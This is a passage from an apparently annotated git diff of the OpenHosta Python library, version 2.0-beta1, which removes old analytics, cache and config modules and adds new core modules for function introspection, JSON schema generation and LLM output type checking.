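        self.api_key = api_key

class DefaultModel:
    """Singleton holding the process-wide default model."""
    _instance = None

    def __new__(cls, *args, **kwargs):
        if cls._instance is None:
            cls._instance = super().__new__(cls)
        return cls._instance

    def __init__(self):
        if not hasattr(self, "model"):
            self.model = None

    def set_default_model(self, new):
        if isinstance(new, Model):
            self.model = new

DefaultManager = DefaultModel()

# Import-time initialisation mirroring the new OpenHosta.py: the key comes
# from the environment, so no secret is hard-coded in the source.
DefaultManager.set_default_model(
    Model(model="gpt-4o",
          base_url="https://api.openai.com/v1/chat/completions",
          api_key=os.getenv("OPENAI_API_KEY") or None)
)
```

Because `DefaultModel.__new__` always returns the same instance, later imports see the same configured model.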
diff --git a/src/OpenHosta/__init__.py b/src/OpenHosta/__init__.py
index da9ccef..4f70251 100644
--- a/src/OpenHosta/__init__.py
+++ b/src/OpenHosta/__init__.py
@@ -1,3 +1,3 @@
from .OpenHosta import *
-__version__ = "1.2.1"
+__version__ = "2.0-beta1"
diff --git a/src/OpenHosta/analytics.py b/src/OpenHosta/analytics.py
deleted file mode 100644
index 9b59686..0000000
--- a/src/OpenHosta/analytics.py
+++ /dev/null
@@ -1,127 +0,0 @@
-import tiktoken
-from enum import Enum
-import time as t
-import sys
-import json
-
-from .config import Model, DefaultManager
-from .prompt import PromptMananger
-
-_x = PromptMananger()
-
-_estimate_prompt = _x.get_prompt("estimate")
-
-l_default = DefaultManager.get_default_model()
-
-
-class ModelAnalizer(Model):
-
- _default_input_cost: int = 0.005
- _default_output_cost: int = 0.015
- _default_token_perSec = 63.32
- _default_latency = 0.48
-
- def __init__(
- self,
- name: str,
- input_cost: float,
- output_cost: float,
- latency: float,
- token_perSec: float,
- ):
- self.name = self._default_name if name is None else name
- self.input_cost = self._default_input_cost if input_cost is None else input_cost
- self.output_cost = (
- self._default_output_cost if output_cost is None else output_cost
- )
- self.latency = self._default_latency if latency is None else latency
- self.token_perSec = (
- self._default_token_perSec if token_perSec is None else token_perSec
- )
- self.tokenizer = tiktoken.get_encoding("cl100k_base")
-
- def get_input_cost(self):
- return self.input_cost
-
- def get_output_cost(self):
- return self.output_cost
-
- def get_latency(self):
- return self.latency
-
- def get_token_perSec(self):
- return self.token_perSec
-
- def _estimate_output_token(self, function_doc: str, function_call: str):
- global _estimate_prompt, l_default
-
- try:
- if not _estimate_prompt:
- raise ValueError("ValueError -> emulate empty values")
- except ValueError as v:
- sys.stderr.write(f"[ESTIMATE_ERROR]: {v}")
- return None
-
- l_user_prompt = (
- "\n Here's the fonction documentation:\n"
- + f"{function_doc}\n"
- + "Here's the function call:\n"
- + f"{function_call}\n"
- )
-
- response = l_default._api_call(
- sys_prompt=_estimate_prompt,
- user_prompt=l_user_prompt,
- creativity=0.2,
- diversity=0.2,
- )
-
- if response.status_code == 200:
- data = response.json()
- json_string = data["choices"][0]["message"]["content"]
- try:
- l_ret_data = json.loads(json_string)
-
- except json.JSONDecodeError as e:
- sys.stderr.write(f"JSONDecodeError: {e}")
- l_cleand = "\n".join(json_string.split("\n")[1:-1])
- l_ret_data = json.loads(l_cleand)
-
- l_ret = l_ret_data["tokens"]
- else:
- sys.stderr.write(f"Error {response.status_code}: {response.text}")
- l_ret = None
-
- return l_ret
-
- def _compute_request_cost(self, input_text, output_token):
- input_tokens = self.tokenizer.encode(input_text)
- num_input_tokens = len(input_tokens)
- num_output_tokens = output_token
- cost_input = (num_input_tokens / 1000) * self.input_cost
- cost_output = (num_output_tokens / 1000) * self.output_cost
- total_cost = cost_input + cost_output
- return total_cost
-
- def _compute_request_duration(self, output_token):
- total = self.latency
- total += self.token_perSec / output_token
- total += 0.5 # Processing duration margin
- return total
-
-
-def request_timer(func):
- def wrapper(*args, **kwargs):
- g_c = "\033[94m"
- n = "\033[0m"
- bold = "\033[1m"
-
- start = t.time()
- rv = func(*args, **kwargs)
- end = t.time()
-
- duration = end - start
- print(f"{g_c}{bold}Execution time of {func.__name__}: {duration:.2f}s{n}")
- return rv
-
- return wrapper
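For reference, the deleted `ModelAnalizer._compute_request_cost` priced a request per thousand tokens. The formula, extracted as a standalone function (the defaults are the class constants from the removed file; the function name is ours):

```python
def request_cost(num_input_tokens: int, num_output_tokens: int,
                 input_cost: float = 0.005, output_cost: float = 0.015) -> float:
    """Per-request cost formula from the removed ModelAnalizer:
    prices are expressed per 1000 tokens."""
    return (num_input_tokens / 1000) * input_cost \
        + (num_output_tokens / 1000) * output_cost
```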
diff --git a/src/OpenHosta/build.py b/src/OpenHosta/build.py
deleted file mode 100644
index 9b56069..0000000
--- a/src/OpenHosta/build.py
+++ /dev/null
@@ -1,10 +0,0 @@
-from .config import Model, DefaultManager
-
-def _exec_build(
- _function_infos : dict = None,
- _function_obj: object = None,
- model: Model = None,
-
-):
- pass
-
diff --git a/src/OpenHosta/builder.py b/src/OpenHosta/builder.py
deleted file mode 100644
index 304e9dd..0000000
--- a/src/OpenHosta/builder.py
+++ /dev/null
@@ -1,57 +0,0 @@
-import json
-import os
-import torch
-
-from .model import CustomLinearModel
-
-class Builder():
- def __init__(self, hidden_dir):
-
- self.hidden_dir = hidden_dir
-
-
- def build(self, len_input, len_output, complexity, config, optimizer, loss):
- assert len_input > 0, "Input size must be greater than 0"
- assert len_output > 0, "Output size must be greater than 0"
-
- if complexity == None:
- complexity = 5
- if optimizer != None:
- print("\033[93mWarning: The change of optimizer is not available for now, AdamW is actually used.\033[0m")
- optimizer = "AdamW"
- if loss != None:
- print("\033[93mWarning: The change of loss are not available for now, Smooth1Loss is actually used.\033[0m")
- loss = "SmoothL1Loss"
-
- if config == None:
- config = {
- "architecture": "LinearRegression",
- "input_size": len_input,
- "hidden_size_1": len_input * (2 * complexity),
- "hidden_size_2": len_input * (4 * complexity),
- "hidden_size_3": len_input * (2 * complexity),
- "output_size": len_output,
- "optimizer": optimizer,
- "loss": loss
- }
-
- config_json = json.dumps(config)
- config_path = os.path.join(self.hidden_dir, "config.json")
-
- with open(config_path, "w") as f:
- f.write(config_json)
- return config["architecture"]
-
- def load_inference(self, config_path, weight_path, inference):
- with open(config_path, "r") as file:
- config = json.load(file)
-
- model = CustomLinearModel(config, self.hidden_dir)
- model.load_state_dict(torch.load(weight_path, weights_only=True))
- output = model.forward(inference)
- return output
-
- def trains(self, config, train, val, epochs, verbose, get_loss, continue_training):
-
- model = CustomLinearModel(config, self.hidden_dir)
- model.train(train, val, epochs, self.hidden_dir, verbose, get_loss, continue_training)
diff --git a/src/OpenHosta/cache.py b/src/OpenHosta/cache.py
deleted file mode 100644
index 23896c5..0000000
--- a/src/OpenHosta/cache.py
+++ /dev/null
@@ -1,200 +0,0 @@
-import pickle
-import os
-import hashlib
-import inspect
-from typing import Callable, Dict, Any, get_origin, get_args
-import typing
-import collections
-from pydantic import BaseModel, create_model
-
-
-CACHE_DIR = "__hostacache__"
-os.makedirs(CACHE_DIR, exist_ok=True)
-
-
-class Hostacache:
- def __init__(self, func, cache_id=None, value=None) -> None:
- self.func = func
- self.cache_id = cache_id
- self.value = value
- self.infos_cache = {
- "hash_function": "",
- "function_def": "",
- "return_type": "",
- "return_caller": "",
- "function_call": "",
- "function_args": {},
- "function_locals": {},
- "ho_example": [],
- "ho_example_id": 0,
- "ho_example_links": [],
- "ho_cothougt": [],
- "ho_cothougt_id": 0,
- "ho_data": [],
- "ho_data_id": 0,
- }
-
- def create_hosta_cache(self):
- func_name = self.func.__name__
- path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
-
- if self.cache_id is None:
- if os.path.exists(path_name):
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
- return cached_data
- else:
- return self._parse_and_create_cache_file(path_name)
-
- if os.path.exists(path_name):
- with open(path_name, "rb") as f:
- cached_data = pickle.load(f)
- assert self.cache_id in cached_data, "Cache ID not found in cache file"
- if self.value is not None:
- if not self._is_value_already_in_example(self.value, cached_data):
- cached_data[str(self.cache_id)].append(self.value)
- cached_data[f"{str(self.cache_id)}_id"] = self._get_hashFunction(
- str(cached_data[str(self.cache_id)]), 0, 0
- )
- cached_data["hash_function"] = self._get_hashFunction(
- cached_data["function_def"],
- cached_data["ho_example_id"],
- cached_data["ho_cothougt_id"],
- )
- with open(path_name, "wb") as f:
- pickle.dump(cached_data, f)
-
- return cached_data
-
- return self._parse_and_create_cache_file(path_name)
-
- def _parse_and_create_cache_file(self, path_name):
- """ When cache_id is None or cache doesn't exist, create a cache just for function metadata """
- hosta_args = self._get_argsFunction(self.func)
- with open(path_name, "wb") as f:
- pickle.dump(hosta_args, f)
- return hosta_args
-
- def _get_argsFunction(self, func_obj):
- self.infos_cache["function_def"], func_prot = self._get_functionDef(func_obj)
- self.infos_cache["return_type"], self.infos_cache["return_caller"] = (
- self._get_functionReturnType(func_obj)
- )
-
- if self.cache_id is not None and self.value is not None:
- if self.cache_id in self.infos_cache:
- self.infos_cache[self.cache_id].append(self.value)
- else:
- self.infos_cache[self.cache_id] = [self.value]
-
- self.infos_cache[f"{self.cache_id}_id"] = self._get_hashFunction(
- str(self.infos_cache[self.cache_id]), 0, 0
- )
-
- self.infos_cache["hash_function"] = self._get_hashFunction(
- self.infos_cache["function_def"],
- self.infos_cache["ho_example_id"],
- self.infos_cache["ho_cothougt_id"],
- )
- return self.infos_cache
-
- def _is_value_already_in_example(self, value, cached_data):
- if self.cache_id not in cached_data:
- print("Cache ID not found in cache file")
- return False
-
- def recursive_check(item, value):
- if isinstance(item, dict):
- if item == value or any(recursive_check(v, value) for v in item.values()):
- return True
- elif isinstance(item, list):
- return any(recursive_check(sub_item, value) for sub_item in item)
- else:
- return item == value
-
- for item in cached_data[self.cache_id]:
- if recursive_check(item, value):
- return True
- return False
-
- def _get_hashFunction(self, func_def: str, nb_example: int, nb_thought: int) -> str:
- combined = f"{func_def}{nb_example}{nb_thought}"
- return hashlib.md5(combined.encode()).hexdigest()
-
- def _get_functionDef(self, func: Callable) -> str:
- sig = inspect.signature(func)
-
- func_name = func.__name__
- func_params = ", ".join(
- [
- (
- f"{param_name}: {param.annotation.__name__}"
- if param.annotation != inspect.Parameter.empty
- else param_name
- )
- for param_name, param in sig.parameters.items()
- ]
- )
- func_return = (
- f" -> {sig.return_annotation.__name__}"
- if sig.return_annotation != inspect.Signature.empty
- else ""
- )
- definition = (
- f"```python\ndef {func_name}({func_params}):{func_return}\n"
- f" \"\"\"\n\t{func.__doc__}\n \"\"\"\n```"
- )
- prototype = f"def {func_name}({func_params}):{func_return}"
- return definition, prototype
-
- def _inspect_returnType(self, func: Callable) -> str:
- sig = inspect.signature(func)
-
- if sig.return_annotation != inspect.Signature.empty:
- return sig.return_annotation
- else:
- return None
-
- def _get_typingOrigin(self, return_type) -> bool:
- origin = get_origin(return_type)
- return origin in {
- list,
- dict,
- tuple,
- set,
- frozenset,
- typing.Union,
- typing.Optional,
- typing.Literal,
- collections.deque,
- collections.abc.Iterable,
- collections.abc.Sequence,
- collections.abc.Mapping,
- }
-
- def _get_functionReturnType(self, func: Callable) -> Dict[str, Any]:
- return_caller = self._inspect_returnType(func)
- return_type = None
-
- if return_caller is not None:
- if self._get_typingOrigin(return_caller):
- return_caller_origin = get_origin(return_caller)
- return_caller_args = get_args(return_caller)
- combined = return_caller_origin[return_caller_args]
- new_model = create_model(
- "Hosta_return_shema", return_hosta_type_typing=(combined, ...)
- )
- return_type = new_model.model_json_schema()
- elif issubclass(return_caller, BaseModel):
- return_type = return_caller.model_json_schema()
- else:
- new_model = create_model(
- "Hosta_return_shema", return_hosta_type=(return_caller, ...)
- )
- return_type = new_model.model_json_schema()
- else:
- No_return_specified = create_model(
- "Hosta_return_shema", return_hosta_type_any=(Any, ...)
- )
- return_type = No_return_specified.model_json_schema()
- return return_type, return_caller
\ No newline at end of file
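The removed `Hostacache` keyed its cache entries on an md5 digest of the function definition plus the example and chain-of-thought counters, so editing the function or adding examples invalidated the cache. That invalidation key in isolation (function name is ours):

```python
import hashlib

def cache_key(func_def: str, nb_example: int, nb_thought: int) -> str:
    """Invalidation key from the removed Hostacache._get_hashFunction:
    md5 of the function definition concatenated with the counters."""
    combined = f"{func_def}{nb_example}{nb_thought}"
    return hashlib.md5(combined.encode()).hexdigest()
```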
diff --git a/src/OpenHosta/config.py b/src/OpenHosta/config.py
deleted file mode 100644
index 2546623..0000000
--- a/src/OpenHosta/config.py
+++ /dev/null
@@ -1,202 +0,0 @@
-import sys
-import requests
-import json
-import re
-from jsonschema import validate
-from pydantic import BaseModel
-from typing import get_origin, get_args
-
-from .errors import ApiKeyError
-
-
-def is_valid_url(url):
- regex = re.compile(
- r"^(?:http|ftp)s?://"
- r"(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|"
- r"localhost|"
- r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|"
- r"\[?[A-F0-9]*:[A-F0-9:]+\]?)"
- r"(?::\d+)?"
- r"(?:/?|[/?]\S+)$",
- re.IGNORECASE,
- )
- return re.match(regex, url) is not None
-
-
-class Model:
-
- _SYS_PROMPT = ""
-
- def __init__(self, model: str = None, base_url: str = None, api_key: str = None):
- self.model = model
- self.base_url = base_url
- self.api_key = api_key
- self._last_request = None
-
- self.conversion_function = {
- str: lambda x: str(x),
- int: lambda x: int(x),
- float: lambda x: float(x),
- list: lambda x: list(x),
- set: lambda x: set(x),
- frozenset: lambda x: frozenset(x),
- tuple: lambda x: tuple(x),
- bool: lambda x: bool(x),
- type(None): lambda x: None,
- }
-
- if any(var is None for var in (model, base_url)):
- sys.stderr.write(f"[CONFIG_ERROR] Empty values.")
- return
- elif not is_valid_url(self.base_url):
- sys.stderr.write(f"[CONFIG_ERROR] Invalid URL.")
- return
-
- def __str__(self) -> str:
- return (
- f"[OpenHosta] <{self.__class__.__module__}.{self.__class__.__name__} object at {hex(id(self))}>\n"
- f"Model: {self.model}\n"
- f"Base_url: {self.base_url}\n"
- "Infos:\n"
- )
-
- def api_call(
- self, sys_prompt: str, user_prompt: str, creativity: float, diversity: float
- )->requests.models.Response:
- if self.api_key is None or not self.api_key:
- raise ApiKeyError("Empty API key.")
-
- l_body = {
- "model": self.model,
- "messages": [
- {
- "role": "system",
- "content": [{"type": "text", "text": sys_prompt}],
- },
- {
- "role": "user",
- "content": [{"type": "text", "text": user_prompt}],
- },
- ],
- "response_format": {"type": "json_object"},
- "temperature": creativity if creativity is not None else 0.7,
- "top_p": diversity if diversity is not None else 0.7,
- }
- headers = {
- "Content-Type": "application/json",
- "Authorization": f"Bearer {self.api_key}",
- }
- self._last_request = l_body
-
- try:
- response = requests.post(self.base_url, json=l_body, headers=headers)
- response.raise_for_status()
- except requests.exceptions.RequestException as e:
- sys.stderr.write(f"\n[CALL_ERROR] Request failed:\n{e}\n\n")
- if response.status_code != 200:
- if "invalid_api_key" in str(response.text):
- raise ApiKeyError("Incorrect API key.")
- else:
- sys.stderr.write(f"[CALL_ERROR] API call was unsuccessful.\nStatus code: {response.status_code}:\n{response.text}")
- return response
-
- def request_handler(self, response, return_type, return_caller):
- l_ret = None
-
- data = response.json()
- json_string = data["choices"][0]["message"]["content"]
-
- try:
- l_ret_data = json.loads(json_string)
- # validate(
- # instance=l_ret_data.get("return", {}),
- # schema=return_type.get("properties", {}),
- # ) # REFACTO
- except json.JSONDecodeError as e:
- sys.stderr.write(f"JSONDecodeError: {e}")
- l_cleand = "\n".join(json_string.split("\n")[1:-1])
- l_ret_data = json.loads(l_cleand)
- l_ret = l_ret_data["return"]
- return l_ret
-
- if "return_hosta_type" in return_type["properties"]:
- if return_caller in self.conversion_function:
- convert_function = self.conversion_function[return_caller]
- if l_ret_data["return"] is not None:
- l_ret = convert_function(l_ret_data["return"])
- else:
- l_ret = l_ret_data["return"]
-
- elif "return_hosta_type_typing" in return_type["properties"]:
- l_ret = self.convert_to_type(l_ret_data["return"], return_caller)
-
- elif "return_hosta_type_any" in return_type["properties"]:
- l_ret = l_ret_data["return"]
-
- elif issubclass(return_caller, BaseModel):
- try:
- l_ret = return_caller(**l_ret_data["return"])
- except:
- sys.stderr.write("Unable t parse answer: ", l_ret_data["return"])
- for m in self.__last_request["messages"]:
- sys.stderr.write(" "+m["role"]+">\n=======\n", m["content"][0]["text"])
- sys.stderr.write("Answer>\n=======\n", l_ret_data["return"])
- l_ret = None
-
- else:
- l_ret = l_ret_data["return"]
-
- return l_ret
-
- def convert_to_type(self, data, type):
- origin = get_origin(type)
- args = get_args(type)
-
- if origin != None:
- if origin in self.conversion_function:
- convert_function = self.conversion_function[origin]
- return convert_function(self.convert_to_type(d, args[0]) for d in data)
-
- return data
-
-
-class DefaultModel:
- _instance = None
-
- def __new__(cls, *args, **kwargs):
- if cls._instance is None:
- cls._instance = super(DefaultModel, cls).__new__(cls, *args, **kwargs)
- return cls._instance
-
- def __init__(self):
- if not hasattr(self, "model"):
- self.model = None
-
- def set_default_model(self, new):
- if isinstance(new, Model):
- self.model = new
- else:
- sys.stderr.write("[CONFIG_ERROR] Invalid model instance.\n")
-
- def set_default_apiKey(self, api_key=None):
- if api_key is not None or isinstance(api_key, str):
- self.model.api_key = api_key
- else:
- sys.stderr.write("[CONFIG_ERROR] Invalid API key.")
-
- def get_default_model(self):
- return self.model
-
-
-DefaultManager = DefaultModel()
-
-
-def set_default_model(new):
- DefaultManager.set_default_model(new)
-
-
-def set_default_apiKey(api_key=None):
- DefaultManager.set_default_apiKey(api_key)
-
-
-__all__ = Model, set_default_apiKey, set_default_model, DefaultManager
diff --git a/src/OpenHosta/core/__init__.py b/src/OpenHosta/core/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/src/OpenHosta/core/analizer.py b/src/OpenHosta/core/analizer.py
new file mode 100644
index 0000000..127d95e
--- /dev/null
+++ b/src/OpenHosta/core/analizer.py
@@ -0,0 +1,295 @@
+from __future__ import annotations
+
+from typing import (
+ Any,
+ Dict,
+ get_args,
+ get_origin,
+ Union,
+ List,
+ Tuple,
+ Mapping,
+ Sequence,
+ Collection,
+ Literal,
+ Final,
+ Type,
+ Annotated,
+ ClassVar,
+ Protocol,
+ AnyStr,
+ ByteString,
+ Set,
+ FrozenSet,
+ AbstractSet,
+ Optional,
+ Callable,
+ OrderedDict,
+ TypeVar
+)
+from types import FrameType, MethodType, NoneType
+import inspect
+
+from ..utils.import_handler import is_pydantic
+
+__all__ = (
+    "FuncAnalizer",
+)
+
+
+class FuncAnalizer:
+ """
+ A class for inspecting the signature, definition, and call information of a function.
+
+ Args:
+ func (Callable): The function to inspect.
+
+ Attributes:
+ func (Callable): The function to inspect.
+ sig (Signature): The signature of the function.
+ """
+
+ def __init__(self, func: Union[Callable, MethodType] | None, caller_frame: FrameType | None):
+ """
+ Initialize the function inspector with the given function.
+
+ Args:
+ func (Callable): The function to inspect.
+ caller_frame (FrameType): The function's frame in which it is called.
+ """
+ try:
+ self.func = func
+ self.sig = inspect.signature(func)
+ _, _, _, self.values = inspect.getargvalues(caller_frame)
+        except Exception as e:
+            raise AttributeError(
+                f"[FuncAnalizer.__init__] Invalid arguments:\n{e}")
+
+ @property
+ def func_def(self) -> str:
+ """
+ Build the string representing the function's definition.
+
+ Returns:
+ The string representing the function's definition.
+ """
+ func_name = self.func.__name__
+ func_params = ", ".join(
+ [
+ (
+ f"{param_name}: {param.annotation.__name__}"
+ if param.annotation != inspect.Parameter.empty
+ else param_name
+ )
+ for param_name, param in self.sig.parameters.items()
+ ]
+ )
+ func_return = (
+ f" -> {self.sig.return_annotation.__name__}"
+ if self.sig.return_annotation != inspect.Signature.empty
+ else ""
+ )
+ definition = (
+ f"```python\ndef {func_name}({func_params}):{func_return}\n"
+ f" \"\"\"\n\t{self.func.__doc__}\n \"\"\"\n```"
+ )
+ return definition
+
+ @property
+ def func_locals(self) -> Tuple[Optional[Dict[str, Any]], Any]:
+        """
+        Get the attributes and local variables of the function call.
+
+        Returns:
+            A tuple containing the local variables and, for bound methods, the instance attributes.
+        """
+ values_locals = {k: v for k, v in self.values.items()
+ if k not in self.sig.parameters}
+ values_locals.pop('self', None)
+
+ values_self = None
+ if hasattr(self.func, '__self__'):
+ values_self = getattr(self.func.__self__, '__dict__', None)
+ return values_locals or None, values_self
+
+ @property
+ def func_call(self) -> Tuple[str, OrderedDict[str, Any]]:
+ """
+ Build a string representing the function call.
+
+ Returns:
+ A tuple containing a string representing the function call and the bound arguments.
+ """
+ values_args = {k: v for k, v in self.values.items()
+ if k in self.sig.parameters}
+
+ bound_args = self.sig.bind_partial(**values_args)
+ bound_args.apply_defaults()
+
+ bound_arguments = bound_args.arguments
+
+ args_str = ", ".join(
+ f"{k}={v!r}" for k, v in bound_arguments.items()
+ )
+ call_str = f"{self.func.__name__}({args_str})"
+ return call_str, bound_arguments
+
+ @property
+ def func_type(self) -> Tuple[List[Any], Any]:
+ """
+        Get the input and output types of the function.
+
+        Returns:
+            A tuple containing the input types and the output type.
+ """
+ input_types = [
+ param.annotation for param in self.sig.parameters.values()
+ ]
+ output_type = self.sig.return_annotation if self.sig.return_annotation != inspect.Signature.empty else None
+ return input_types, output_type
+
+ def _get_type_schema(self, tp: Any) -> Dict[str, Any]:
+ """
+ Generate a JSON schema for a given type.
+
+ Args:
+ tp: The type to generate the schema for.
+
+ Returns:
+ The JSON schema for the type.
+ """
+ if tp == Any:
+ return {"type": "any"}
+
+ origin = get_origin(tp)
+ args = get_args(tp)
+
+ if origin in (Union, Optional):
+ if len(args) == 2 and (NoneType in args or type(None) in args):
+ main_type = args[0] if args[1] in (
+ NoneType, type(None)) else args[1]
+ return {
+ "anyOf": [
+ self._get_type_schema(main_type),
+ {"type": "null"}
+ ]
+ }
+ return {"anyOf": [self._get_type_schema(arg) for arg in args]}
+
+ if origin in (list, List, Sequence, Collection):
+ return {
+ "type": "array",
+ "items": self._get_type_schema(args[0]) if args else {"type": "any"}
+ }
+
+ if origin in (dict, Dict, Mapping):
+ return {
+ "type": "object",
+ "additionalProperties": self._get_type_schema(args[1]) if args else {"type": "any"}
+ }
+
+ if origin is Final:
+ return self._get_type_schema(args[0]) if args else {"type": "any"}
+
+ if origin is Type:
+ return {"type": "object", "format": "type"}
+
+ if origin is ClassVar:
+ return self._get_type_schema(args[0]) if args else {"type": "any"}
+
+ if origin is Annotated:
+ return self._get_type_schema(args[0])
+
+ if origin is Literal:
+ return {"enum": list(args)}
+
+ if origin in (tuple, Tuple):
+ if len(args) == 2 and args[1] is ...:
+ return {
+ "type": "array",
+ "items": self._get_type_schema(args[0])
+ }
+ return {
+ "type": "array",
+ "prefixItems": [self._get_type_schema(arg) for arg in args],
+ "items": False
+ }
+
+ if origin in (set, Set, frozenset, FrozenSet, AbstractSet):
+ return {
+ "type": "array",
+ "uniqueItems": True,
+ "items": self._get_type_schema(args[0]) if args else {"type": "any"}
+ }
+
+ if hasattr(tp, "__annotations__") and isinstance(tp, type) and hasattr(tp, "__total__"):
+ properties = {
+ key: self._get_type_schema(value)
+ for key, value in tp.__annotations__.items()
+ }
+ required = [key for key in properties.keys()] if getattr(
+ tp, "__total__", True) else []
+ return {
+ "type": "object",
+ "properties": properties,
+ "required": required,
+ "additionalProperties": False
+ }
+
+ if isinstance(tp, TypeVar):
+ if tp.__constraints__:
+ return {
+ "anyOf": [
+ self._get_type_schema(constraint)
+ for constraint in tp.__constraints__
+ ]
+ }
+ elif tp.__bound__:
+ return self._get_type_schema(tp.__bound__)
+ else:
+ return {"type": "any"}
+
+ if isinstance(tp, type) and issubclass(tp, Protocol):
+ return {"type": "object", "format": "protocol"}
+
+ if tp is int:
+ return {"type": "integer"}
+ if tp is float:
+ return {"type": "number"}
+ if tp is str or tp is AnyStr:
+ return {"type": "string"}
+        if tp is list:
+            return {"type": "array"}
+        if tp is dict:
+            return {"type": "object"}
+ if tp is bool:
+ return {"type": "boolean"}
+ if tp is NoneType or tp is None:
+ return {"type": "null"}
+ if tp is bytes or tp is bytearray or tp is ByteString:
+ return {"type": "string", "format": "binary"}
+
+ raise ValueError(f"[_get_type_schema] Unsupported type: {tp}")
+
+ @property
+ def func_schema(self) -> Dict[str, Any]:
+ """
+ Get the JSON schema of the function's return type.
+
+ Returns:
+ The JSON schema of the function's return type.
+ """
+ return_caller = self.sig.return_annotation if self.sig.return_annotation != inspect.Signature.empty else None
+
+ if return_caller is not None:
+ if is_pydantic:
+ from .pydantic_usage import get_pydantic_schema
+
+ pyd_sch = get_pydantic_schema(return_caller)
+ if pyd_sch is not None:
+ return pyd_sch
+ return self._get_type_schema(return_caller)
+ else:
+ return self._get_type_schema(Any)
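`FuncAnalizer._get_type_schema` above walks a return annotation and emits a JSON-Schema fragment. A condensed, standalone sketch of the same mapping, covering only builtins, `List`, and `Optional` (the full method handles many more `typing` constructs):

```python
from typing import Any, List, Optional, get_args, get_origin

def type_schema(tp):
    """Condensed version of FuncAnalizer._get_type_schema: map a Python
    annotation to a JSON-Schema fragment (builtins, List, Optional only)."""
    if tp is Any:
        return {"type": "any"}
    origin, args = get_origin(tp), get_args(tp)
    if origin is list:
        return {"type": "array",
                "items": type_schema(args[0]) if args else {"type": "any"}}
    if origin is not None and type(None) in args:  # Optional[X] / Union[X, None]
        main = next(a for a in args if a is not type(None))
        return {"anyOf": [type_schema(main), {"type": "null"}]}
    basics = {int: "integer", float: "number", str: "string", bool: "boolean"}
    if tp in basics:
        return {"type": basics[tp]}
    raise ValueError(f"unsupported annotation: {tp}")
```

The recursion on type arguments is what lets nested annotations like `List[Optional[int]]` produce nested schemas.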
diff --git a/src/OpenHosta/core/checker.py b/src/OpenHosta/core/checker.py
new file mode 100644
index 0000000..633af28
--- /dev/null
+++ b/src/OpenHosta/core/checker.py
@@ -0,0 +1,114 @@
+from __future__ import annotations
+
+from types import NoneType
+from typing import Type, Any, Dict, Optional, Callable, TypeVar
+
+from .hosta import Func
+from ..utils.import_handler import is_pydantic
+
+T = TypeVar('T')
+
+
+class HostaChecker:
+ """
+    A class used to check and convert the output of a Language Model (LLM) to the type specified in a function's annotation.
+
+    Args:
+        func (Func): A function object that contains the type annotations for the LLM output.
+        data (dict): A dictionary containing the LLM output data to be checked and converted.
+
+    Attributes:
+        func (Func): The function object containing the type annotations for the LLM output.
+        data (dict): The LLM output data to be checked and converted.
+        checked (Any): The checked and converted data. If `data` contains a "return" key, its value is used as the checked data. Otherwise, `data` is used as the checked data.
+        is_passed (bool): A flag indicating whether the checked data should be converted. It is set to True if `data` contains a "return" key.
+ """
+
+ def __init__(self, func: Func, data: dict):
+ self.func = func
+ self.data = data
+ try:
+ self.checked = self.data["return"]
+ self.is_passed = True
+ except KeyError:
+ self.checked = self.data
+ self.is_passed = False
+
+ def _default(self, x: Any) -> Any:
+ """
+        A default conversion function that returns the input as is.
+
+        Args:
+            x (Any): The input data to be converted.
+
+        Returns:
+            Any: The input data as is.
+ """
+ return x
+
+    def convert(self, typ: Type[T]) -> Callable[[Any], T]:
+        """
+        A method to look up the conversion function for a given type.
+
+        Args:
+            typ (Type[T]): The type for which a conversion function is needed.
+
+        Returns:
+            Callable[[Any], T]: The conversion function for `typ`, or a pass-through default.
+        """
+ convertMap = {
+ NoneType: lambda x: None,
+ str: lambda x: str(x),
+ int: lambda x: int(x),
+ float: lambda x: float(x),
+ list: lambda x: list(x),
+ set: lambda x: set(x),
+ frozenset: lambda x: frozenset(x),
+ tuple: lambda x: tuple(x),
+ bool: lambda x: bool(x),
+ dict: lambda x: dict(x),
+ complex: lambda x: complex(x),
+ bytes: lambda x: bytes(x),
+ }
+        if typ not in convertMap:
+            return self._default
+        return convertMap[typ]
+
+ def convert_annotated(self) -> Any:
+ """
+ A method to convert the checked data based on the type annotations of the function.
+
+ Returns:
+ Any: The converted checked data based on the type annotations.
+ """
+ if getattr(self.func.f_type[1], '__module__', None) == 'typing':
+ pass # Make a deep checking when annotated (see below)
+ return self.checked
+ # origin = get_origin(self.func.f_type[1])
+ # args = get_args(self.func.f_type[1])
+
+ # if origin != None:
+ # if origin in self.convert:
+ # convert_function = self.convert[origin]
+ # return convert_function(self.convert_to_type(d, args[0]) for d in self.checked)
+ # return self.checked
+ # else:
+ # return self.checked
+
+ def check(self) -> Any:
+ """
+        A method to check and convert the input data based on the function's type annotations and Pydantic model annotations.
+
+ Returns:
+ Any: The checked and converted data. If `data` contains a "return" key, its value is used as the checked data. Otherwise, `data` is used as the checked data.
+ """
+ if self.checked == "None" or self.checked is None:
+ return None
+ if self.is_passed:
+ self.checked = self.convert(self.func.f_type[1])(self.checked)
+ self.checked = self.convert_annotated()
+ if is_pydantic:
+ from .pydantic_usage import convert_pydantic
+
+ self.checked = convert_pydantic(self.func.f_type[1], self.checked)
+ return self.checked
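`HostaChecker.check` pulls the `"return"` field out of the parsed LLM response and coerces it with the builtin constructor matching the annotation. A minimal standalone sketch of that path (the function name `coerce_return` is ours, not part of the library):

```python
def coerce_return(payload, annotation):
    """Sketch of HostaChecker.check: extract the "return" key from the
    parsed LLM payload and coerce it to the annotated builtin type."""
    value = payload.get("return", payload)
    # The LLM may answer with the string "None"; treat it as a real None.
    if value == "None" or value is None:
        return None
    convert = {str: str, int: int, float: float, bool: bool,
               list: list, tuple: tuple, dict: dict}
    # Unknown annotations fall through unchanged, as in the library.
    return convert.get(annotation, lambda x: x)(value)
```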
diff --git a/src/OpenHosta/core/config.py b/src/OpenHosta/core/config.py
new file mode 100644
index 0000000..65284b8
--- /dev/null
+++ b/src/OpenHosta/core/config.py
@@ -0,0 +1,158 @@
+from __future__ import annotations
+
+import sys
+import json
+import re
+import sys
+import requests
+from typing import Any, Dict
+
+from .checker import HostaChecker
+from .pydantic_usage import Func
+from ..utils.errors import ApiKeyError, RequestError
+
+
+def is_valid_url(url: str) -> bool:
+ regex = re.compile(
